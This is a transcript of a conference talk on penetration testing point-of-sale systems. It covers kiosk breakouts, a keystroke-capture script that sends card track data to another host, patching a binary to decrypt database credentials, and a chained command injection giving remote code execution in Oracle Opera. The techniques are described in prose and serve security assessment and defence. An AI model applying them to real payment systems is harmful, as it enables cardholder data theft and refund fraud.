 Thank you, everyone. Hey, everyone. So yeah, this is actually our first time at NorthSex. So we'd like to thank all the organizers for actually accommodating us and having us here. And I thank all of you guys for coming out. So my name is Jackson Thurdy Sammy. Pierre David already introduced me, but that's some information about me. And go ahead and introduce Jason. Yep. And my name is Jason Tran. So currently, I'm actually an application security engineer at Twitch Interactive. I did work with Jackson at Security Compass for a little over two years. And Pierre gave a bit of my background, so we'll just continue on. There's my contact information as well, if you'd like to contact me. So some of you may have been confused, which acronym is which in our title. So we ended up leaving them both here. So welcome to our talk, Hacking, Piece of Shit, Point of Sale Systems. Now, I'm certain all of you have some basic knowledge of what a PLA system is, but in general, it's where a sales transaction takes place. And these systems can range from being purely mechanical, like the one at my barber shop, to one computer-based ones that you commonly see in today's retail stores. And today, a lot of product-based startups use modern looking point of sales interfaces that don't actually run out in specialized hardware and can run on devices. And the state of PLA systems has been interesting over the last couple of years. Back in October 2015, there's been an EMV shift in liability in the US. So what this means is that there's, for credit card fraud and charge back, do the insecurity of magstripe use is now on the responsibility of merchants themselves, rather than the card issuers, if the PLA system doesn't support PIN chip cards. And a lot of companies really have been transitioned to chip card readers, especially in the states. So the point of this talk is to understand point of sale tax better. For people who are more so on the offensive side, the goal from us is to share some interesting techniques so you can provide a bit more value to your assessments. And if you're on the defensive side, well, in order to defend, it really helps to really understand what you're defending against. So we'll start fairly high level, and we'll get more technical and expose some fairly serious vulnerabilities toward the end. As you can see on the list of the case studies, with the exception of the Oracle application, we've censored some detailed information about the other applications. And we have a lot to cover, so we'll be going fairly quickly. So we'll start off with these standards. So to preface this section a little bit, we just want to be clear that we're not QSAs. We're here looking at the standards from a penters perspective. And this is just to give layout of the ground for the case studies that we're going to bring up later. So the two standards are PCI DSS and PADSS. They're spelled out up there. And in general, for these two standards, PCI tells merchants and service providers how to protect sensitive information, while PADSS tells payment application developers how to design and create coding patterns that are compliant with PCI. So we're going to go over what they cover, the differences, and some attack factors that aren't explicitly covered in these standards. So a quick shout out to Slava Gomson, who created actually this hacking point of sale book. If you're interested, I highly recommend picking this up. So here we have a handy chart on some of the vulnerability areas, attack factors, which standards their address and who's ultimately responsible for the mitigation. And you can see that all of them put the onus on the merchants themselves with a couple of them on both the vendor and the merchants. So the key takeaway here is that some merchants, including big and small companies, may let issues that arise from pentests to slip because the assumption is that PA vendors will take care of these issues. So we'll move on to some vectors of attacks that these standards might not necessarily cover. So today we're going to be focusing purely on just PA DSS. And the first requirement, 1.1, it says to do not store full magnetic stripe, card verification code, or value, or pin block, and more specifically, do not store sensitive authentication data after authorization, even if it's encrypted. So if you pay close attention, this doesn't stop you from disconnecting from the network and to see if the data is actually stored in clear text before being transmitted. And it's important to note that this hasn't really been addressed in any of the other requirements. So MagStorip data could be stored in clear on the actual PLS system. So requirement 2 to elaborate is to protect stored card holder data and to encrypt data using secure algorithms and implementations. So in this standard, it's not quite that obvious which strong encryption algorithms to use and which implementations are to be used. And from an attacker's perspective, it's important to investigate any interactions with the database and to find weaknesses in the actual connections, to see if the application is using weak encryption workflows, default passwords in its database, plain text credentials and configurations and temp files and so on. So the third one we're going to go over today is requirement 5 to develop secure payment applications. And in some cases, developers and operations personnel may turn a bit of a blind eye to securing the actual systems itself. And thus, having a weak point outside the application, outside the scope of these standards, and for some companies who do do compliance audits, they don't occur frequently enough to the point where any of the new exploits in the wild can be patched before they're actively exploited. And from the attacker's perspective, again, to look for configuration flaws related to any of the newer public exploits. And then requirement 9, so the cardholder data must never be stored on a server connected to the internet. So from an attacker's perspective, look into the internal network endpoints themselves and see if there are any interactions with externally facing components. And as an example that Jackson will go on to later, an application that was configured to be externally accessible could be compromised in order to access the internal database containing cardholder data. So now that we've kind of discussed some of the standards and some of the pitfalls, let's get into physically assessing the POS. So while doing a POS assessment, it's important to identify any obvious physical access points to your target. What sort of barriers does it have? Is it a computer resistant podium? Can you pick up the computer itself? What IO do you have access to? Is it locked with the key? These are just some of the things to look out for. So in this first example, we encountered a pretty simple lock that covered over the POS IO ports. It was easily picked, and you could also easily just rip off the cover with your hands. And from there, you could plug in a mouse and keyboard to interact with the system without using the touchscreen interface. And this definitely made things a lot easier. And funny enough, it was called real POS. So in this next example, we had an all-in-one computer, and it was deeply recessed into podium. And after some fiddling, we could pick it up from the podium. And again, we could easily access the IO ports, connect a keyboard and mouse, and interact with the system a little easier. So in some of our assessments, we did see some implantations that attempted to prevent IO access. On the left side here, you can see a little tiny USB insert to block the port. And the tool right beside it hooks into the insert. And after flipping the switch, you could pull out the tool and leave the insert inside the USB port. Now, this is pretty simple to bypass. You could just, you know, bend some paper clips into the two hooks and pull it out. So now we've talked a bit about overcoming physical barriers. We can go over our experiences in breaking out of the actual kiosk. So quite simply, kiosk modes are a locked-down version of the system that force you to do certain tasks in the public setting where the POS is. And some restrictions include not being able to launch Task Manager, or not being able to right-click and use context venues, or not being able to use Ruble Storage. And these are enforced by what are called group policy objects, and can be done to specific users, paths, and programs, and so forth. And in these assessments, we usually ask clients what type of GPOs are in place, as there are a lot of them. And generally, it's very rare to see a completely locked-down PLS system. And there are usually many ways to break out and gain access to the system. Now, if you're doing this type of pentest for a client's environment, it's better value to find as many vectors as you can, rather than pigeonholing yourself into one. Two really good references that we've used. It's called WinIntro and TrustedSec. WinIntro is great for describing all the different GPOs. And TrustedSec is good for performing PLS assessments from a red team's perspective. So one case study that I want to get into, it's involving administrative startup scripts. So in this case study, privilege escalation was technically possible after breaking a kiosk mode. But there were a lot of things that prevented ease of use to navigate the system. For example, there was a script that would kick us back out into kiosk mode after breaking out. And what we found to make things easier was to eventually create a local admin user to control the machine. So how do we do this? We noticed that during the reboot process, there would be scripts running right before the kiosk mode finished booting up. And we messed around a bit, tried to tamper a bit. And eventually, when we started pausing the scripts, one of them would specifically halt and leave a command prompt open. And luckily, this was running in administrative mode. So from there, we could create a local admin, navigate the system with relative ease, and disable these scripts kicking us back into kiosk mode. So one of the goals when trying to break out of kiosks is to try to get some sort of explorer window or some sort of command prompt so that from there we can try to run programs that allow some level of execution. The slide here shows the use of sticky keys. So you just press the Shift key about five times, and then you get a window to pop up. And then from there, you can click on a link to launch and explore a window. So as far as I know, I'm not sure of any GPO policy to disable this, but it is something that can be disabled through the registry. Now, once you have a window open, you can try to launch different applications. So in this case, there just happens to be Microsoft Word running on this system. And then once I launch that, I can try to create some sort of macro. And in this case, it's just launching PowerShell, but it could also launch other applications as well. Another example is with a scenario where I was working with what seemed to be a lockdown instance of Intranet Explorer. I couldn't open any files. You can see on the slide that there is no file menu. But I was able to eventually get a file open dialogue box through the in private filtering section of the manage add-on dialog. And then from there, I would try to get a context menu so I can open arbitrary programs easily. Now, one of the challenges I had was if I tried to right-click an item, there would be no context menu that would open. But if I enable the preview pane, select the item, and then right-click the preview pane, then I would get the context menu. And then in this case, there happened to be NoPad++ installed. And then from there, I could try to run an application. Now, in these cases, there were some applications that are not everywhere, like NoPad++ or Microsoft Word. So it's best to make the best of what you have in an environment. So in situations where certain keyboard shortcuts were blocked, we still found that using media key shortcuts were helpful. And some of these media keys had Windows Explorer launch buttons, which would ultimately lead us to some form of execution vector. And then there were situations where keyboards can be plugged into the actual PLS system. But it turns out that we could actually use existing barcode scanners to act as keyboards. With certain models, it was actually possible to reprogram them and use a limited set of keyboard shortcuts like Windows R to get a run dialog or a control O to get a file open dialog. And this is actually part of the advanced data formatting standard. And you can learn more about it from Tencent's Bad Barcode article online. And that barcode is actually on the slide. And it's a link to the article. And if you like, you can check that out. So now that we've talked about breaking out, many people would think that the next natural step is to elevate your privileges. But for some of these assessments, we found that the PLS system was already running as Min. And sometimes they weren't. And like in the previous case study I was talking about, admin privileges aren't always necessary. But they can definitely make things easier to reliably break out disabled mitigations in place in the system or just set up persistency. So the goal that we have when we're doing PCI pen tests isn't necessarily to get DA. I mean, that would be cool. But we're trying to ensure that attackers can't get access to cardholder data. So even if you got DA, at some point, you'd probably have to go back to the application layer to try to see if you can extract that sensitive data out. So what we found to kind of make better use of our time in these assessments is to ideally have a scenario where you can have two specialists working on two POS devices at the same time. So in both systems, the POS application runs with a configuration for a test environment. So you can't obviously do real transactions with them. In the first POS, the OOS is hardened. It's as close to production as possible. And this is intended to see if we can try to break out and try to pivot from there. And then in the second POS, the OOS is not hardened. It's not in a restrictive environment at all. But the point of using that is to find application vulnerabilities in that environment. So the first specialist works on POS number one. They'd be ideally familiar with circumventing system hardening measures. And then for the second specialist, they would ideally have more of an APSAC background or some sort of reversing background. Focusing on finding bugs that could lead to cardholder data disclosure. So the benefit that we find with this approach is that you don't waste time trying to break out in order to start beginning the testing of the actual POS application. So next we'll go through some of the potential ways to achieve our goals in getting cardholder data and some examples that we've seen in assessments. So remember that data has to go somewhere in clear text. And this is often memory. PPA vendors aren't forced to any standards in protecting data and memory. And ultimately, it falls under the liability of the merchants and the users of the software. Some tools to scrape memory are win-hacks, which can use regex to look for Visa Mastercard Mx cards. And we also use memory scraper, a C-sharp utility, which can attach to Windows processes. For data in transit, it's not a higher priority for attackers, especially when TLS is being used. And it's important from an attacker's perspective to find the path of least resistance to get the cardholder data. And that's why data at rest is the ultimate goal, as you can find a bigger repository of credit card data at once. So here's an example of Max Drive Breeder malware. This is the type of attack that you see more often in the news, where attackers somehow implant some malware on it and then they start collecting the data from the magnetic stripes to clone cards. Now, the reason that some of this happens is because you have plug-and-play USB magnetic stripe readers that have keyboard emulation mode enabled. So when you're swiping the card, what's really happening is it's just typing out the numbers. So for a couple of my assessments, what I ended up doing is I just put together a simple Python script, compile it to EXE, and I would just use the Win32 API to hook into keyboard events, look for character sequences that are associated with track one and two data. And then after collecting that data, it would maybe just send it off to another host and maybe for persistence, it would add a startup shortcut for the logged in user. Now, although this does the trick, it's maybe good enough for a pen test. I wouldn't really call this malware just because I think it's really basic compared to what a real attacker should do. There should be more stealthier ways to persist on the system, and EX will treat the data. Now, considering that several systems have their Magstripe readers in keyboard emulation mode, some could be more vulnerable, especially when they only require a card swipe to log in. So we've seen a scenario where the data on the Magstripe is actually just the ID number that's printed on the card. And if you're able to plug in a keyboard to the POS, then you just simply start typing in the ID that's on the card to get access. Now, what's potentially more troubling with this is that you could also just start incrementing or decrementing the ID to get access to other accounts. And if you get lucky, you can find one with more privileges than what you already had. All right, so before I get to the next case study, I'll just quickly speak about what two-tier architecture is for those who may not know. So applications that have a two-tier architecture talk to the database directly instead of having an intermediary application server. So when it comes to submitting payment information, it'll directly insert rows into the database. And this is problematic because it can become difficult to do integrity checks. And overall, two-tier architectures seem to be less secure than three-tier architecture, where there is an application server in the middle. So in this situation, the POS system had a Windows desktop application that would communicate directly with a SQL server. And the production environment was just using a default corporate image that wasn't locked down to kiosk mode. But it was also difficult to lock it down to kiosk mode for everyone, because sometimes there would be people in finance that would use the application, and they can't just run that application in a full kiosk mode in order to get the data that they need. So the idea is that if a maliciously motivated insider can exfiltrate the application's binaries, they could do a lot of the analysis work they need to compromise the application offline. And this is pretty attractive, because the goal is to get access to all that cardholder data in the database instead of stealing one card at a time, like in the previous example. So when I was looking at this, something that was really interesting to me was that the database connection information was stored in an INI settings file. And as you can see, the name and password seems to be encrypted. And ideally, to decrypt them, you would need the ciphertext that you're seeing, the encryption key, and information about the algorithm that's being used. So to edit the file, they had a separate database INI editor application, where administrators could input the connection information to update that INI file. And what struck me a lot about this is that although the credentials appear to be symmetrically encrypted, there didn't seem to be any evidence of some sort of shared key file that was visible to the user. So using disassembler and debugger, I tried to dig deeper. And I determined that the encryption key was actually just stored in the binary. So now that I have the encryption key, I also needed to know information about the details of the algorithm that was being used. But since I only had a day and a half for this assessment, I needed to figure out a faster way to get the credentials. So when I put it through an assembler, I was lucky enough to not have all the function names just stripped out of the binary. So there was one called encrypt string. So I looked for that in the debugger, and you can see what it looks like when it's about to encrypt the username and password. So through the static analysis, it turned out that the application had a decrypt string method with the same function signature that just wasn't called by the UI. So by patching the binary to call decrypt string instead of encrypt string, I could figure out a way to decrypt the credentials. So some of you might see where this is going. Basically, with the patch version, I take these credentials, I copy them, and then I paste them into the patch version. And when I click the Process button, it'll update the file, and I'll get my database credentials to get access. So once I got access to the database, I found the tables where the cardholder information is stored. And as I expected, the individual credit card numbers were stored encrypted. But because decryption is done on the client side, you just need to further analyze the POS software more to figure out how to decrypt those. I didn't get that far because of time restrictions, but in a more realistic scenario, that's something that should be feasible. And beyond credit card information, once you have access to a database like that, there's a lot more that you can look into or start tampering with. So one of them is stealing login IDs, especially if you have a scenario where the POS system that you're using only just takes a card swipes login so you don't type in a password or anything. So then ideally, you can start finding the different login IDs for that. Or you may be in a scenario where there may be that initial user, like user number 1 or 0, where they have some sort of super user ID that could work on any instance of that application. And then sometimes for performance reasons, certain tables, like the one for item prices, are cached. They're periodically updated. But when the application is querying that information, it's querying it locally. So sometimes it could be just possible to update those prices and then not have any validation checks when the transaction occurs. So that's the vulnerabilities for that one. And then I'll talk about the Oracle Opera application. So I'm not sure if many of you have heard of this, but it's basically a property management system that's used at a lot of major boutique hotels. It's basically the software that EC staff use behind the counter. And it allows them to manage reservations or process payments. And I'll talk about three approaches that an attacker can take to gain access to the cardholder data in the database. So one of them is through a privilege escalation on the application itself. The other one is where the database connection string is somehow exposed. And then lastly, there was a way to get remote code execution as system. So one thing I'd want to mention is that all of these techniques were discovered through ways that would be almost impossible to find in an unauthenticated black box environment. But the reality is that for vendor applications, a real attacker doesn't always need to be restricted to their target environment. There are some ways around it. So for the first one, the vulnerability was exposed session logs. So this was a page that was in a temporary static directory. And it had a lot of debug information. And it seemed to log active session tokens. So when you have a list of active session tokens, it's just a matter of time for an administrator to log in. And again, this is a page that users don't come across through standard interaction. So how would a real attacker find these URLs if they're not exposed? Well, one is if they're really well resourced, they could just run their own instance of the server software and find out how it's working from there. Another one is they could potentially find a vulnerable instance of Opera on a vulnerable server. Maybe there's some sort of misconfiguration that could give them access to that server. They may not be going after that one particularly. But the point is for them to develop capabilities that could be used towards their actual targets. And then another one is if they maybe just gain access to the binaries themselves and do some static analysis on that to see if they could find where files like those are being written. And when you compare it with in-house software, it's something that's not usually possible because you don't have scenarios like this. So once you have a token of an administrator user, you can start to impersonate them. And once you're in the application, you can launch what's called the Opera SQL tool to interact with the database. And you can see here that I've queried credit card information, but it's stored encrypted. The caveat with this approach is that every query is logged on the application layer, so it's not that stealthy. And also, it's really slow to use this interface compared to getting direct access to the database. So the way where it was possible to get that was through accessing certain pages. Now, the responses of these pages show things that you can start piecing together to get that connection string at the bottom. And once you have that, assuming that you're on the same network as the database server, which is not always possible, you can get access to the database that way. And of course, again, once you're in the database, it's not just the cardholder data that you can get access to. You can start tampering reservations or putting your own thing and maybe upgrading someone's room, potentially. And then the third one is the remote code execution vector. So what can an attacker do if they find an application server that's exposed on the internet, but the database server is not? And that's where this vector could come in. And I think it's probably my favorite finding among the three because it takes a bunch of seemingly unrelated functionality, and then it chains them together towards some malicious purpose. So the first thing is a diagnostic process information servlet that returns some information once you give it a PID, a process ID. So what may not be obvious to the black box tester is that that PID flows into a concatenated string for command execution. And then an attacker could modify the value for the PID parameter like shown below. And what this does is it outputs the standard out of the who am I command into a directory that would be accessible from the URL at the bottom. So let's see what happens when this is attempted. When you go through the first URL with your malicious payload, you just get an error that says this, some sort of exception. I mean, it seemed like it would have worked, but instead I just got an error message saying that some sort of file wasn't found. So when we look at the corresponding code for that servlet, we can see two things. The green part is what would execute the command that I supply, but obviously the red part, because it's part of the same function, needs to be done before getting to the green part. The problem is that there's a certain file that doesn't exist at the location that it's looking at. So there's a couple of things that need to be done. First, we need to find that value of the Oprah Home property, and then we save it to the location where it's expected to be found. So just coincidentally, there happened to be another servlet that just gave me the information of the Oprah Home property. And then there was yet another servlet that just allowed me to put that in a file and upload it to the place that I wanted to on the system. It's basically a remote file inclusion vector. So now that I've patched or fixed the system in some way, I can start trying this again. And eventually I can go to the link on the bottom and hopefully get that output. So when I try the first link again with my malicious payload, I get this sort of error instead, where it says there's no process with PID 100 and percent, who am I, and so on. So I mean, like obviously that's a legitimate error and invalid PID was provided. I mean, our payload wasn't just a process ID. But when we go to that link, the test.txt file, then we can see the output of that command. So if you think about this, I think from here, like sure you can run SQL plus for some sort of client now connect to the database. But if this is exposed externally, you've kind of now found an initial entry point into a corporate network by exploiting some third party vendor code that it's not easy for administrators within that company to audit themselves. You can also put this together in a script just to make it easier. So the next part is once you get into the database, how do you start getting the card holder data? So I guess before I continue, I'll just say maybe a quick tip. It's obvious to some of you probably, but when you're starting an assessment, it's always just fun to like dive in and just do whatever you want and see how far you can quickly get with it. But it also helps just to take a step back and do your recon. Reading documentation is boring. It's not fun all the time, but it's part of what we do and it can get far and help you save time from testing hypotheses that are just ultimately useless. Especially if you had access to the code, you could see that certain payloads that you try doing just won't work. So by reading some of the documentation, I immediately understood how the application was performing encryption and how it was storing keys. And I learned that triple DS was being used and not only were the keys stored in the database, but the code for encryption and decryption was also stored in the database as well. So by running the query on the slide, I could find the obfuscated code at the package body where the keys are stored. And anything that can be obfuscated can always be de-obfuscated. So that's what this PL, SQL and wrapper script above does. You could see that we found the encryption keys and then the next step is to build some sort of script that can handle the decryption for me. And that's what I did at the bottom. So at the top, you can see a row returned. It has the encrypted value and then using the script below, I can now start to decrypt the credit card number. So that was Oracle Opera and I'll start with the next vulnerability or the next case study. So this was an application intended for sales associates who would just roam around a store allowing customer to purchase items on the spot without having to wait in line. It consisted of a company's store application plus a third-party payments application that connects to a wireless chip and pen device. And since this is something that customers normally wouldn't be able to interact with themselves, I started looking into some of the more malicious things a sales associate could do. So I really wanted to know how that store application communicated with the payments application. And even though it was an iOS device, iOS application, it just turned out to be an accelerator titanium application which is kind of like a right once run anywhere platform that allows developers to make iOS and Android applications written in JavaScript. So the thing is when the app is built, the contents of those JavaScript files are encrypted. So I can't just do a string search to get what I want to start looking at some of the stores around it. And I think there was another talk some time ago on how the encryption worked on Android but not a lot of details for the iOS counterpart. So for me, this was a pretty good excuse to start learning how to use Frida. And it allowed, for those who don't know what that is, it's a tool that allows you to inject code and hook into functions of black box processes. So I ended up writing a small tool to help me with the decryption that should also hopefully work on other applications built with titanium. So here it is, it's pretty simple to use, assuming you have a jailbroken iOS device with Frida installed. The QR code on the right is a link to the repo. And basically using Frida, it just searches the application's memory for JavaScript file paths. And then it invokes titanium zone decryption routine to output the ciphertext into plaintext files. So once I got some of the code back, I started tracing the data flow for the amount value of a transaction. And I came across an interesting function that looked like this. So by the looks of it, the way that that store application communicated to that payment application was through something like this with a custom URI scheme. And what stood out to me was that these requests were authenticated with a token that just happened to be hard coded. And then there was a mode operation. And it didn't take me too long to figure out that you can change the value there to switch it from payments mode to refund mode. So then the next thing I did was just make like a, you know, like a simple webpage as a proof of concept. So in terms of demonstrating the vulnerability, this page would just basically, you set the mode, you set the amount, and then it would call the payment application using that custom URI scheme. I think the most difficult part for this was getting the CSS right so I could vertically center it. But yeah, the idea is that a malicious attacker could secretly browse to a page that then allows them to launch that payment application in refund mode and then allow them to refund some arbitrary amount they specify. So let's close out with some key takeaways and the questions period. So first point, attack factors are not always explicitly covered in the PCI and PADSS. They aren't the end solution to everything and there's always really areas that are vulnerable. Circumvet physical barriers to make testing easier. So if there's a way to not operate in the kiosk interaction methods, such as touch screens and use peripherals, such as keyboards and mice, take it because, you know, the path of least resistance is always easier. Kiosk breakout techniques can be limited to specific environments. And basically this just means that, you know, there's not one size that fits all. The things you see today may not apply to all environments. And in order to be successful, you really need to understand the conditions of the environment for these techniques to really work. Understanding the interactions between the OS and the evolved applications are pretty important. And for privilege escalations, getting administrative OS privileges is not often necessary to steal that data. I mean, the goal of these assessments is to go after PCI data and not necessarily to get DA. Even if you manage to get DA, there likely won't be some sort of share that has all the card holder data and plain text. So you still need to go back to the application layer to exfiltrate that data. And another takeaway is, I mean, many of the applications that we assessed were PADSS certified and yet there were still some vulnerabilities. So putting applications like these, whether they're PADSS certified or just vendor applications on a corporate network, they're pretty attractive to attackers because they have a lot more to work with to develop exploitation capabilities and to research vulnerabilities. So that concludes our talk. Thanks to everyone for attending.